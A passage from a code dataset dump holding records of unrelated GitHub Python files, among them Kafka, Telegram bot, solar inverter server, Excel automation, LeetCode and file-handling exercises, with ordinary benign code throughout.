[\"3\",\"4\",\"5\",\"6\",\"7\"]],\n [[\"6\"], [\"4\",\"5\",\"6\"]],\n [[\"2\",\"3\",\"4\",\"5\",\"6\"], [\"4\",\"5\",\"6\",\"7\",\"8\"]]\n ]\n assert len(overlaps) == 4\n\ndef test_findAnyOverlappedAssignments_finds_correct_overlaps_using_provided_input_file():\n f = open(\"input.txt\", \"r\")\n assignments = f.readlines()\n f.close()\n\n cc = CampCleanup()\n cc.load(assignments)\n assert len(cc.findAnyOverlappedAssignments()) == 886","repo_name":"mightymuke/advent-of-code-2022","sub_path":"Day 4 - Camp Cleanup/test_campcleanup.py","file_name":"test_campcleanup.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73674741494","text":"from kafka import KafkaConsumer\nimport argparse\nimport struct\nimport requests\nimport os\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--host')\n parser.add_argument('--topic')\n parser.add_argument(\"--security-protocol\")\n parser.add_argument(\"--schema-registry\")\n return parser.parse_args()\n\nargs = get_args()\nprint(\"args:\", args)\n\n# To consume latest messages and auto-commit offsets\nconsumer = KafkaConsumer(\n args.topic,\n security_protocol=args.security_protocol,\n group_id='group-id-1',\n auto_offset_reset=\"earliest\",\n bootstrap_servers=args.host.split(\",\")\n)\n\nprint(\"configured\")\nfor message in consumer:\n\n try: \n magic, schema_id = struct.unpack('>bI', message.value[:5])\n print(magic, schema_id)\n schema_url = f\"{args.schema_registry}/subjects/{args.topic}-value/versions/{schema_id}\"\n print(f\"try recover schema by {schema_url}\")\n schema = requests.get(schema_url, headers={'Content-Type': 'application/json'})\n print(schema.json())\n # f\"http://localhost:8081/schemas/ids/1\"\n # f\"http://localhost:8081/subjects/{args.topic}-value/versions/1\"\n\n except Exception as e:\n print(e)\n \n print(\"topic=%s partition=%d offset=%d key=%s value=%s\" % (message.topic, message.partition, message.offset, message.key, message.value))\n\n\nos.exit()","repo_name":"luizamboni/kafka-study","sub_path":"apps/examples/basic/basic-consumer.py","file_name":"basic-consumer.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"42313608932","text":"import os, sys, getpass, socket, platform\nfrom shutil import copyfile\n\n# ************* Base Manager *************\nclass baseManager():\n def __init__(self):\n self.host = self.getHostname()\n self.user = self.getUser()\n self.sysInfo = self.getSysInfo() \n self.root = self.getRoot()\n self.avatarSrc = self.avatarSrc()\n\n\n def getUser(self):\n username = getpass.getuser()\n return username\n\n def getHostname(self):\n hostname = socket.gethostname()\n return hostname\n\n def getSysInfo(self):\n sysInfo = {}\n details = platform.uname()\n\n if sys.platform == 'linux' or sys.platform == 'linux2':\n sysInfo = dict(base=details.system, os=platform.dist()[0].capitalize(), kernel=details.release,\n architecture=details.machine, processor=details.processor)\n elif sys.platform == 'darwin':\n # Find a Darwin system to perform unit-testing\n # macInfo = platform.mac_ver(release='', versioninfo=('', '', ''), machine='')\n sysInfo = dict(base=details.system, os=platform.mac_ver()[0].capitalize(), kernel=platform.release(),\n architecture=details.machine, processor=details.processor)\n elif sys.platform == 'win32':\n sysInfo = dict(base=details.system, os=platform.win32_ver()[0].capitalize(), kernel='Windows NT',\n architecture=details.machine, processor=details.processor)\n\n return sysInfo\n\n #def getArchitecture(self):\n\n\n def avatarSrc(self):\n path = \"\"\n if self.sysInfo['base'] == 'Linux' or self.sysInfo['base'] == 'Linux2':\n gnome2Base = os.path.join('/home', self.user, '.face')\n gnome3Base = open(os.path.join('/var', 'lib', 'AccountsService', 'users', self.user), 'r')\n\n # Gnome 2 check\n if os.path.exists(gnome2Base):\n path = gnome2Base\n else:\n #Gnome 3 check\n for line in gnome3Base:\n if line.startswith('Icon='):\n path = str(line[5:])\n path = path.strip('\\n')\n gnome3Base.close()\n\n return path\n\n def getRoot(self):\n path = ''\n if self.sysInfo['base'] == 'Linux' or self.sysInfo['base'] == 'Linux2':\n path = os.path.join('/home', self.user, '.RootNET')\n\n if not os.path.exists(path):\n os.mkdir(path)\n os.chmod(path, 0o700)\n\n return path\n\n\nif __name__ == \"__main__\":\n xd = baseManager()\n print(xd.getSysInfo())\n\n\n","repo_name":"CodeRoot-Systems/RootNET","sub_path":"lib/libbase.py","file_name":"libbase.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12901799825","text":"import os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('copy.txt')#打开文件copy.txt\nn=open('new.txt','w')#创建文件new.txt\ns=f.readline()\nwhile s!='':#直到文章的末尾\n n.writelines(s)\n s=f.readline()\nf.close()\nn.close()\n#思路:手动读取第一行文字,然后用while循环控制复制结束\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('cat1.txt','a')#打开文件copy.txt\nn=open('cat2.txt')#创建文件new.txt\ns=n.readline()\nwhile s!='':#直到文章的末尾\n f.writelines(s)\n s=n.readline()\nf.close()\nn.close()\n#思路:只需要在第一题的基础上将操作模式等修改即可\n\n#判断是否是符合条件的整数\ndef func(n):\n s=str(abs(n))\n if len(s)<2:\n return False\n for i in range(len(s)):\n if (i%2==0) and ((ord(s[i])-48)%2==0):\n return False\n return True\n#主程序\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('StrInts.txt','rb+')#打开文件\nr=open('ResultInts.txt','w+')#创建文件\ns=f.readlines()\nj,l,n,ss=0,[],-1,' '\nfor i in range(len(s)):\n ss=bytes.decode(s[i])\n for i in range(len(ss)):\n o=ord(ss[i])\n if o in range(48,58):\n if j<0:\n j=j*10+48-o\n if j>0:\n j=j*10+o-48\n if not(ord(ss[i-1])in range(48,58)):\n j=o-48\n if ss[i-1]=='-':\n j=0-j\n\n elif j!=0:\n l.append(j)\n j=0\nprint(l)\nll=[]\nfor i in l:\n if func(i):\n ll.append(i)\nfor i in range(((len(ll)-1)//3)+1):#枚举每行\n s=''\n for j in range(3*i,min(len(ll),3*i+3)):\n # 用min来防止最后的一两个越界\n s=s+'%8d'%ll[j]\n #s=str.encode(s)\n r.writelines(s)\n\nf.close()\nr.close()\n\n#思路:(1)读入每行\n# (2)寻找数字\n# (3)判断数字\n# (4)输出\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('students_data.txt','rb+')#打开文件\ns=f.readlines()\nl=[[None for _ in range(3)]for _ in range(len(s))]\nfor i in range(len(s)):\n ss=bytes.decode(s[i])\n l[i]=list(ss.split())\n l[i][0]=int(l[i][0])\n l[i][2] = int(l[i][2])\n print('%-10d%-15s%5d'%tuple(l[i]))\n#排序\nl.sort(key=lambda x:x[0])\n#清空txt\nf.seek(0)\nf.truncate()\n#重新输入\ns=int(input('please input the s:'))\nfor i in range(len(l)):\n if l[i][0]>=s:\n ss=' '.join((str(l[i][0]),l[i][1],str(l[i][2]),'\\n')).encode()\n print(ss)\n f.write(ss)\n\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('numbers.txt','rb+')#打开文件\nr=open('sort.txt','w+')#创建文件\ns=f.readlines()\nl=[]\nfor i in range(len(s)):\n l.append(float(s[i].decode()))\n#排序\nl.sort()\ntot=sum(l)\n#平均值\np=tot/len(l)\ntot=0\nfor i in l:\n ss=str(i)+'\\n'\n r.write(ss)\n tot+=(i-p)**2\nss=str(p)+'\\n'\nr.write(ss)\n#方差\nfang=tot/len(l)\nss=str(fang)+'\\n'\nr.write(ss)\n#思路:整体读入一行行处理,排序,计算平均值和方差,写入文件\n\n\nimport os\nos.chdir(r'd:/python-ch10/folder/')#改变当前工作目录\nf1=open('file1.txt')#打开文件1\nf2=open('file2.txt')#打开文件2\nf3=open('file3.txt')#打开文件3\nf4=open('file4.txt')#打开文件4\nn=open('merge.txt','w+')#创建文件\ns=f1.readline()\nwhile s!='':#直到文章的末尾\n n.writelines(s)\n s=f1.readline()\nn.writelines('\\n')\ns=f2.readline()\nwhile s!='':#直到文章的末尾\n n.writelines(s)\n s=f2.readline()\nn.writelines('\\n')\ns=f3.readline()\nwhile s!='':#直到文章的末尾\n n.writelines(s)\n s=f3.readline()\nn.writelines('\\n')\ns=f4.readline()\nwhile s!='':#直到文章的末尾\n n.writelines(s)\n s=f4.readline()\n#思路:文件一个一个读入,按照第一题的方式进行写入,切换文件中途换行\n\n\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('word.txt')#打开文件\nr=open('new_word.txt','w+')#创建文件\ns=f.readlines()#储存单词\nfor i in s:\n if i[0].upper() in ('A','E','I','O','U'):\n r.write(i)#写入\n#思路:打开文件,判断是否符合,将符合的写入新文件\n\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('names.txt','r+')#打开文件\ns=f.readlines()#储存单词\nss=input('please input a name:')\ns=set(s)\ns.add(ss+'\\n')\ns=list(s)\ns.sort()\n#清空txt\nf.seek(0)\nf.truncate()\nfor i in s:\n f.write(i)\n#思路:打开文件,读入新名字,用集合去重,转化成列表排序,写入\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('bigfile.txt','rb+')#打开文件\nl=[]\nl.append(0)\ns=f.readline()\nl.append(f.tell())\nwhile s!=''.encode():#直到文��的末尾\n s=f.readline()\n l.append(f.tell())\nprint(len(l)-2)#输出行数(第0个和最后一次循环分别多读了一个)\nwhile 1:\n n=int(input('please input the number of the line:'))\n f.seek(l[n-1])\n print(f.readline().decode())\n#思路:用tell先扫描一遍文件,记录每行开头的位置所在,并记录至一个列表\n# 这样在输入之后就可以直接输出\n","repo_name":"CColike/Soochow-University-CS","sub_path":"python/2027405033-exp-9.py","file_name":"2027405033-exp-9.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18215182062","text":"class Solution:\n def maximumInvitations(self, grid: List[List[int]]) -> int:\n m = len(grid)\n n = len(grid[0])\n ans = 0\n mate = [-1] * n # girl's mate\n\n # Returns true if boy i can make an invitation.\n def canInvite(i, seen):\n for j in range(n):\n if not grid[i][j] or seen[j]:\n continue\n seen[j] = True\n if mate[j] == -1 or canInvite(mate[j], seen):\n mate[j] = i # Match girl j with boy i\n return True\n return False\n\n for i in range(m):\n seen = [False] * n\n if canInvite(i, seen):\n ans += 1\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1820. Maximum Number of Accepted Invitations/1820.py","file_name":"1820.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"74991444851","text":"# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\nfrom tests import TestCase, skipIf\n\nfrom quodlibet.util.tags import USER_TAGS\nfrom quodlibet.qltk import is_wayland\n\n\nclass TagsCombo(TestCase):\n def setUp(self):\n self.all = self.Kind()\n self.some = self.Kind([\"artist\", \"album\", \"~people\", \"foobar\"])\n\n def tearDown(self):\n self.all.destroy()\n self.some.destroy()\n\n\nclass TagsComboMixin:\n\n def test_none(self):\n self.failUnlessRaises(ValueError, self.Kind, [])\n\n def test_some(self):\n self.some.set_active(2)\n self.failUnlessEqual(self.some.tag, \"foobar\")\n\n def test_all(self):\n tags = list(USER_TAGS)\n tags.sort()\n for i, value in enumerate(tags):\n self.all.set_active(i)\n self.failUnlessEqual(self.all.tag, value)\n\n\n@skipIf(is_wayland(), \"crashes..\")\nclass TTagsComboBox(TagsCombo, TagsComboMixin):\n from quodlibet.qltk.tagscombobox import TagsComboBox as Kind\n Kind # noqa\n\n\n@skipIf(is_wayland(), \"crashes..\")\nclass TTagsComboBoxEntry(TagsCombo, TagsComboMixin):\n from quodlibet.qltk.tagscombobox import TagsComboBoxEntry as Kind\n Kind # noqa\n\n def test_custom(self):\n self.all.get_child().set_text(\"a new tag\")\n self.failUnlessEqual(self.all.tag, \"a new tag\")\n","repo_name":"quodlibet/quodlibet","sub_path":"tests/test_qltk_tagscombobox.py","file_name":"test_qltk_tagscombobox.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"} +{"seq_id":"29643943056","text":"import sys\nimport datetime\nimport json\nimport threading\n# from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport requests\nfrom HoymilesPrint import get_plant_data, append_to_file, get_power, print_status, glo_inverters, glo_panels\nfrom HoymilesToJson import get_panels_json, get_panels_png\nfrom hoymiles_modbus2.datatypes import PlantData\nfrom typing import Union\nfrom io import BytesIO\n\nserver_port = 8001\nkwhmeter_url = \"http://192.168.59.68:2222/REF\"\n\n\ndef get_next_update_time():\n # Lasketaan seuraava tasaminuutti\n now = datetime.datetime.now()\n next_minute = (now.replace(second=0, microsecond=0) + datetime.timedelta(minutes=1))\n # minutes = next_minute.minute\n # if minutes in [0, 15, 30, 45]: # jätetään väliin vartit\n # next_minute = next_minute + datetime.timedelta(minutes=1)\n\n # Asetetaan ajastin seuraavalle tasaminuutille\n delay = (next_minute - now).total_seconds()\n print(datetime.datetime.now().time(), \"next: \", delay)\n return delay, next_minute\n\n\nlast_plant_data: Union[PlantData, None] = None\nlast_update_time: datetime = datetime.datetime.now()\n\n\ndef get_hoymiles_data():\n global last_plant_data\n global last_update_time\n\n delay, update_time = get_next_update_time()\n threading.Timer(delay, get_hoymiles_data).start()\n\n try:\n print(datetime.datetime.now().time(), \"start\")\n new_plant_data = get_plant_data()\n print(datetime.datetime.now().time(), \"end\")\n if not new_plant_data:\n print(\"no new plant data\")\n return\n # print(datetime.datetime.now().time(), \"haku\")\n print_status(new_plant_data, glo_inverters, glo_panels, sys.stdout, True)\n # append_to_file(new_plant_data)\n except Exception as err:\n print(\"Exception: \", datetime.datetime.now().time(), err)\n return\n\n summa_w = 0\n if new_plant_data.pv_power == 0:\n summa_w = get_power(new_plant_data)\n new_plant_data.pv_power = summa_w\n print(last_update_time, \"->\", datetime.datetime.now().time(), \":\", new_plant_data.pv_power, \"W\", summa_w, \"W\")\n\n if last_update_time and (last_update_time.minute-1) % 5 == 0:\n append_to_file(new_plant_data)\n\n last_plant_data = new_plant_data\n last_update_time = update_time\n\n\ndef handle_hoymiles():\n if not last_plant_data:\n return {'pvPower': 0,\n 'last_plant_data': None,\n 'pvEnergyTotal': None,\n 'pvEnergyToday': None\n }\n total = float(last_plant_data.total_production)\n today = float(last_plant_data.today_production)\n if total == 0:\n total = None\n if today == 0:\n today = None\n return {'pvPower': float(last_plant_data.pv_power),\n 'pvEnergyTotal': total,\n 'pvEnergyToday': today\n }\n\n\ndef handle_kwh_meter():\n response = requests.get(kwhmeter_url)\n if response.status_code != 200:\n print(\"kwhmeter code: \", response.status_code)\n return {'message': 'error'}\n text = response.text\n sts = text.split(\";\")\n return {\n 'mainkW': float(sts[0]),\n 'mainkWh': float(sts[2]),\n 'geokW': float(sts[3]),\n 'geokWh': float(sts[5])\n }\n\n\n\nclass MyHandler(BaseHTTPRequestHandler):\n def get_png(self, t):\n self.send_response(200)\n self.send_header(\"Content-type\", \"image/png\")\n self.end_headers()\n image = get_panels_png(last_plant_data, t)\n output = BytesIO()\n image.save(output, format=\"PNG\")\n self.wfile.write(output.getvalue())\n return t\n\n def do_GET(self):\n if self.path == \"/GetPanelPng\":\n return self.get_png(1);\n if self.path == \"/GetPanelPng2\":\n return self.get_png(2);\n if self.path == \"/GetPanelPng3\":\n return self.get_png(3);\n if self.path == \"/favicon.ico\":\n self.send_response(404)\n self.end_headers()\n return\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.send_header('Access-Control-Allow-Origin', '*')\n self.end_headers()\n if self.path == \"/pannari\":\n data = handle_kwh_meter()\n elif self.path == \"/hoymiles\":\n data = handle_hoymiles()\n elif self.path == \"/all\":\n data1 = handle_hoymiles()\n data2 = handle_kwh_meter()\n data = {**data1, **data2}\n elif self.path == \"/GetPanelData\":\n data = get_panels_json(last_plant_data)\n else:\n data = {\n 'message': 'Tuntematon kutsu?'\n }\n json_data = json.dumps(data)\n self.wfile.write(json_data.encode('utf-8'))\n print(data)\n\n\n# def run(server_class=ThreadingHTTPServer, handler_class=MyHandler, port=server_port):\ndef run(server_class=HTTPServer, handler_class=MyHandler, port=server_port):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print('Serving at port', port)\n get_hoymiles_data()\n # threading.Timer(get_next_update_time()[0], get_hoymiles_data).start()\n httpd.serve_forever()\n\n\nrun()\n","repo_name":"vesal/hoymiles","sub_path":"hoyserver2.py","file_name":"hoyserver2.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22676789255","text":"from datetime import datetime\nstart = datetime.now()\nend = datetime.now()\n# First function (Note the use of xrange since this is in Python 2)\ndef sum1(n):\n '''\n Take an input of n and return the sum of the numbers from 0 to n\n '''\n final_sum = 0\n for x in range(n + 1):\n final_sum += x\n\n return final_sum\n\ndef sum2(n):\n \"\"\"\n Take an input of n and return the sum of the numbers from 0 to n\n \"\"\"\n return (n*(n+1))/2\n\nif __name__ == '__main__':\n print(sum1(10))\n print(sum2(100))\n print(start - end, sum1(100))","repo_name":"Mohammedibrahim2703/py_basics_ds","sub_path":"com/phase1/pythonDS/bigO_DS.py","file_name":"bigO_DS.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24094717670","text":"# Write a word_histogram function that takes a paragraph of text as its input, and returns a dictionary containing the tally of how many times each word in the alphabet was used in the text. For example:\n#\n# >>> word_histogram('To be or not to be')\n# {'to': 2, 'be': 2, 'or': 1, 'not': 1}\n\n#Dict. comprehension\n# def hist(string):\n# tally = {\"key\" : \"value\"}\n# par = string.lower()\n# keyList = par.split()\n# tally = {key: keyList.count(key) for key in keyList}\n# print(tally)\n#\n# hist(\"To be or not to be\")\n\n#Alt method\ndef hist2(string):\n tally = {}\n par = string.lower()\n keyList = par.split()\n for word in keyList:\n if word in tally:\n tally[word] += 1\n else:\n tally[word] = 1\n print(tally)\n\nhist2(\"To be or not to be\")\n# def letter_hist3(word):\n# tally = {}\n# for character in word:\n# if character in tally:\n# tally[character] += 1\n# else:\n# tally[character] = 1\n#\n# print(tally)\n#\n#\n","repo_name":"joshwestbury/Digital_Crafts","sub_path":"python_exercises/py_part4_ex/dict/4_word_summary.py","file_name":"4_word_summary.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10442505164","text":"#libraries\r\nimport sys\r\nimport clr\r\nimport csv\r\nclr.AddReference('ProtoGeometry')\r\nfrom Autodesk.DesignScript.Geometry import *\r\nclr.AddReferenceByName('Microsoft.Office.Interop.Excel, Version=11.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c')\r\nfrom Microsoft.Office.Interop import Excel\r\nfrom System import Array\r\n\r\n#declare inputs\r\ndict = IN[0]\r\ndate = IN[1]\r\ndir = IN[2]\r\nrev = IN[3]\r\nstakeholders = IN[4]\r\npaststatus = IN[5]\r\nupdatedemail = IN[6]\r\nemail = IN[7]\r\ndatesplit = []\r\nissuecount = []\r\nstartrow = 27\r\nstartcol = 6\r\n\r\n#file path\r\nfp_xls = dir + \"\\\\\" + \"Master Drawing Issue Sheet.xls\"\r\nfp_csv = dir + \"\\\\\" + \"data.csv\" \r\n\r\n#open Excel doc\r\nexcel = Excel.ApplicationClass()\r\nexcel.Visible = True\r\nexcel.DisplayAlerts = False\r\n\r\nworkbook = excel.Workbooks.Open(fp_xls)\r\nws = workbook.Worksheets[1]\r\n\r\n#combine email from csv and updated email from user input\r\nemail_bool = [x in email for x in updatedemail]\r\n\r\nif any(email_bool):\r\n\tcombinedemail = updatedemail\r\nelif not any(email_bool):\r\n\tcombinedemail = email + [updatedemail]\r\n\r\n#transpose back revision list\r\nrev_transpose = map(list,zip(*rev))\r\n\r\n#transpose back status list\r\nstatus_transpose = map(list,zip(*paststatus))\r\n\r\n#split date into DD/MM/YY format\r\nfor i in date:\r\n\tdatesplit.append(i.split('/'))\r\n\r\n#count number of sheets issued\r\ncount = 0\r\nfor i in rev[-1]:\r\n\tif i != '':\r\n\t\tcount +=1\r\n\t\tissuecount.append(count)\r\n\t\t\r\n#create dates arrays\r\nfor i in range(len(datesplit)):\r\n\tdatesarr = Array.CreateInstance(object,3, len(date))\r\n\r\n#assign values to dates arrays\r\nfor i in range(len(datesplit)):\r\n\tfor j in range(len(datesplit[i])):\r\n\t\tdatesarr[j,i] = datesplit[i][j]\r\n\r\n#get project code\r\nsplitsheetnum = dict[1][0].split('/')\r\n\r\n#create stakeholders arrays\r\nfor i in range(len(stakeholders)):\r\n\tstakeholdersarr = Array.CreateInstance(object, len(stakeholders), 1)\r\n\r\n#define range of cells\r\n#fixed columns\r\nxlrangesheetnames = ws.Range[ws.Cells(startrow,1), ws.Cells(len(issuecount)+startrow-1,1)]\r\nxlrangesheetnumbers = ws.Range[ws.Cells(startrow,4), ws.Cells(len(issuecount)+startrow-1,4)]\r\nxlrangestakeholders = ws.Range[ws.Cells(startrow-16,startcol-4), ws.Cells(len(stakeholders)+startrow-17,startcol-4)]\r\nxlrangeemail = ws.Range[ws.Cells(startrow-16,startcol), ws.Cells(len(updatedemail)+startrow-17,startcol+ len(date)-1)]\r\n\r\n#fixed rows\r\nxlrangesheetstatus = ws.Range[ws.Cells(startrow-2,startcol), ws.Cells(startrow-2,len(date)+startcol-1)]\r\nxlrangerecord = ws.Range[ws.Cells(startrow-4,startcol),ws.Cells(startrow-4,len(date)+startcol-1)]\r\n\r\n#range of rows and columns\r\nxlrangedate = ws.Range[ws.Cells(startrow-21,startcol), ws.Cells(startrow-19,len(date)+startcol-1)]\r\nxlrangerevision = ws.Range[ws.Cells(startrow,startcol), ws.Cells(len(rev[0])+startrow-1, len(date)+startcol-1)]\r\n\r\n#create arrays\r\nsheetnamearr = Array.CreateInstance(object,len(dict[0]) , 1)\r\nsheetnumberarr = Array.CreateInstance(object,len(dict[1]), len(date))\r\nrevisionarr = Array.CreateInstance(object,len(rev[0]), len(date))\r\nrecordarr = Array.CreateInstance(object,1, len(date))\r\nemailarr = Array.CreateInstance(object,len(updatedemail),len(date))\r\n\r\n\r\n#assign values to record array\r\nfor i in range(len(date)):\r\n\trecordarr[0,i] = 1\r\n\r\n#create status array\r\nstatusarr = Array.CreateInstance(object,1, len(paststatus))\r\n\r\n#assign values to status array\r\nfor i in range(len(paststatus)):\r\n\tstatusarr[0,i] = paststatus[i][0]\r\n\r\n#assign values to arrays\r\nfor i in range(len(dict)):\r\n\tfor j in range(len(dict[i])):\r\n\t\tsheetnamearr[j,0] = dict[0][j]\r\n\t\tsheetnumberarr[j,0] = dict[1][j]\r\n\r\nfor i in range(len(date)):\r\n\tfor j in range(len(rev[i])):\t\r\n\t\trevisionarr[j,i] = rev[i][j]\r\n\r\nfor i in range(len(stakeholders)):\r\n\tstakeholdersarr[i,0] = stakeholders[i]\r\n\r\n#assign values to email array\r\nif any(email_bool):\r\n\tfor i in range(len(combinedemail)):\r\n\t\temailarr[i,0] = combinedemail[i]\r\nelif not any(email_bool):\r\n\tfor i in range(len(combinedemail)):\r\n\t\tfor j in range(len(combinedemail[i])):\r\n\t\t\temailarr[j,i] = combinedemail[i][j]\r\n\r\n\r\n#transpose email arr\r\nif any(email_bool):\r\n\temail_transpose = combinedemail\r\nelif not any(email_bool):\r\n\temail_transpose = map(list,zip(*combinedemail))\r\n\r\n#transpose date split\r\ndate_transpose = map(list,zip(*datesplit))\r\n\r\n#write to csv\r\nwith open(fp_csv, 'wb') as csvfile:\r\n\tcsvwriter = csv.writer(csvfile)\r\n\tcsvwriter.writerows(date_transpose)\r\n\tcsvwriter.writerows(email_transpose)\r\n\tcsvwriter.writerows(status_transpose)\r\n\tcsvwriter.writerows(rev_transpose)\r\n\r\n#write arrays to excel\t\t\r\nxlrangerevision.Value2 = revisionarr\r\nxlrangesheetnames.Value2 = sheetnamearr\r\nxlrangesheetnumbers.Value2 = sheetnumberarr \r\nxlrangesheetstatus.Value2 = statusarr\r\nxlrangerecord.Value2 = recordarr \r\nxlrangedate.Value2 = datesarr\r\nxlrangestakeholders.Value2 = stakeholdersarr\r\nxlrangeemail.Value2 = emailarr\r\n\r\nOUT = 'Success!'","repo_name":"nicholaseaw/AutoTransmittal","sub_path":"writetoExcel.py","file_name":"writetoExcel.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23706249389","text":"from utils import save_file\nfrom info import SESSION, API_ID, API_HASH, BOT_TOKEN, CHANNELS, USERBOT_STRING_SESSION, USER_SESSION, id_pattern\nfrom pyrogram import Client\nimport asyncio\nimport logging\nimport logging.config\n\n# Get logging configurations\nlogging.config.fileConfig('logging.conf')\nlogging.getLogger().setLevel(logging.ERROR)\n\nlogger = logging.getLogger(__name__)\nlock = asyncio.Lock()\n\nasync def main():\n \"\"\"Save old files in database with the help of user bot\"\"\"\n user_bot = Client(USERBOT_STRING_SESSION, API_ID, API_HASH) # Create user bot, b'cause get_chat_history is not available in bot\n bot = Client(SESSION, API_ID, API_HASH, bot_token=BOT_TOKEN)\n\n await user_bot.start()\n await bot.start()\n\n try:\n print('Started')\n for channel in CHANNELS:\n print(f'Checking {channel}') \n async for user_message in user_bot.get_chat_history(channel):\n print(f'Checking {user_message.id}')\n message = await user_bot.get_messages(channel, user_message.id, replies=0)\n for file_type in (\"document\", \"video\", \"audio\"):\n media = getattr(message, file_type, None)\n if media is not None:\n break\n else:\n continue\n \n media.file_type = file_type\n media.caption = message.caption\n await save_file(media)\n print(f'Saved {media.file_name}')\n finally:\n await user_bot.stop()\n await bot.stop()\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","repo_name":"thesuhu/media-finder-bot","sub_path":"run_once.py","file_name":"run_once.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30823083034","text":"from interpreter.interpreter.interpreter import Interpreter\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='Execute .c file')\nparser.add_argument('-f', '--file', help='File with C code')\nparser.add_argument('-c', '--code', help='Code of C code')\n\nargs = parser.parse_args()\nif not args.file and not args.code:\n argparse.ArgumentParser().error('You must choose one argument [-f or -c]')\n\nelif args.file and args.code:\n argparse.ArgumentParser().error('You can choose only one argument [-f or -c]')\n\ncode = ''\nif args.file:\n with open(args.file, 'r') as file:\n code = file.read()\nelse:\n code = args.code\nInterpreter.run(code)\n","repo_name":"SKantar/CInterpreter","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"21"} +{"seq_id":"15938995441","text":"\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.util import fast_module_type\nFastModuleType = fast_module_type.get_fast_module_type_class()\nclass ChildFastModule(FastModuleType):\n return 2\n raise AttributeError(\"Pass to getattr\")\n return 3\nclass FastModuleTypeTest(test.TestCase):\n def testBaseGetattribute(self):\n module = ChildFastModule(\"test\")\n module.foo = 1\n self.assertEqual(1, module.foo)\n def testGetattributeCallback(self):\n module = ChildFastModule(\"test\")\n FastModuleType.set_getattribute_callback(module,\n ChildFastModule._getattribute1)\n self.assertEqual(2, module.foo)\n def testGetattrCallback(self):\n module = ChildFastModule(\"test\")\n FastModuleType.set_getattribute_callback(module,\n ChildFastModule._getattribute2)\n FastModuleType.set_getattr_callback(module, ChildFastModule._getattr)\n self.assertEqual(3, module.foo)\n def testFastdictApis(self):\n module = ChildFastModule(\"test\")\n self.assertFalse(module._fastdict_key_in(\"bar\"))\n with self.assertRaisesRegex(KeyError, \"module has no attribute 'bar'\"):\n module._fastdict_get(\"bar\")\n module._fastdict_insert(\"bar\", 1)\n self.assertTrue(module._fastdict_key_in(\"bar\"))\n self.assertEqual(1, module.bar)\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/fast_module_type_test.py.transformed.py","file_name":"fast_module_type_test.py.transformed.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43715010252","text":"class Solution:\n def findReplaceString(self, s: str, indices: List[int], sources: List[str], targets: List[str]) -> str:\n s = list(s)\n\n def replace(i):\n index = indices[i]\n source = sources[i]\n target = targets[i]\n\n for j, letter in enumerate(source):\n if index+j >= len(s) or s[index+j] != letter:\n return\n\n s[index] = target\n for j in range(index+1, index+len(source)):\n s[j] = ''\n\n for i in range(len(indices)):\n replace(i)\n\n return ''.join(s)\n","repo_name":"kevinlondon/leetcode","sub_path":"0000-0999/833_find_and_replace_string.py","file_name":"833_find_and_replace_string.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31510913345","text":"import os\nimport time\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn.svm as svm\nfrom sklearn.model_selection import train_test_split\nfrom 